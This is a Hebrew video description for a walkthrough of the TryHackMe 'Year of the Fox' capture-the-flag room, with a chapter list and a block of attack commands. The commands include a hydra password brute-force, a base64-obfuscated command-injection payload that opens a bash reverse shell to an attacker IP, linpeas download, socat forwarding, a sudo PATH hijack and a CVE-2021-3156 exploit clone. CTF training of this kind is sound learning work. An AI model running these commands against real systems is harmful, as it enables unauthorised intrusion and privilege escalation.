פריצה בלייב | הדרכת אתגר סייבר | THM Year of the Fox

פתח ב-YouTube

דרג סרטון זה

התחבר כדי לדרג

תיאור

אני מדריך אתכם שלב אחר שלב בפתרון אתגר הסייבר Year of the Fox. כלים וטכניקות: nmap, SMB enumeration, hydra, password attack, command injection, Burp Suite proxy, python, socat port forwarding, netcat, reverse shell, decode, PATH, linpeas, exploit root // קישורים // קישור לאתגר: https://tryhackme.com/room/yotf הצטרפו אלי למועדון: https://tinyurl.com/AviJoin הירשמו לערוץ שלי: http://tinyurl.com/SubsAviCyber היכנסו לערוץ שלי: @AviSevillia // פקודות שימושיות מהאתגר // Some usefull commands from the ch nmap -F -A IP enum4linux -a IP | grep -iv unknown hydra -l "rascal" -P "/usr/share/wordlists/rockyou.txt" IP http-get "/" nc -nvlp 4444 Second Injection code: txt\" ;echo \"YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xNy41Mi41Mi80NDQ0IDA+JjEK\" | base64 -d | bash ; echo \" find / -name "*flag*" cat /var/www/web-flag.txt dpkg --print-architecture python -m http.server 8000 wget http://ATTACK_MACHINE_IP:8000/linpeas_linux_amd64 chmod +x linpeas_linux_amd64 ./linpeas_linux_amd64 ./socat tcp-listen:8888,fork tcp:127.0.0.1:22 & ssh -p 8888 fox@TARGET_IP cat user-flag.txt strings /usr/sbin/shutdown which poweroff chmod +x poweroff export PATH=/tmp:$PATH sudo shutdown find /home -type f -size +1c -size -200c cat /home/rascal/.did-you-think-I-was-useless.root git clone https://github.com/CptGibbon/CVE-2021-3156.git tar -cvf CVE-2021-3156.tar CVE-2021-3156 wget http://10.17.52.52:9000/CVE-2021-3156.tar // פרקים // 00:00 תכנית הפריצה 02:05 סביבת הפריצה 04:20 סריקת פורטים nmap 07:54 סריקת SMB 11:02 תקיפת סיסמאות http 14:06 החדרת פקודה - command injection ו encoding 39:14 איתור הדגל web flag 41:52 decoding 46:52 priviledge escalation with linpeas 52:20 port forwarding with socat 57:58 תקיפת סיסמאות ssh 59:59 איתור הדגל user flag 1:00:25 priviledge escalation with linpeas 1:02:45 sudo PATH overwriting 1:09:00 השגת הדגל root flag 1:12:11 sudo exploit 1:18:07 המלצות להמשך

NeTube Bot
פעיל עכשיו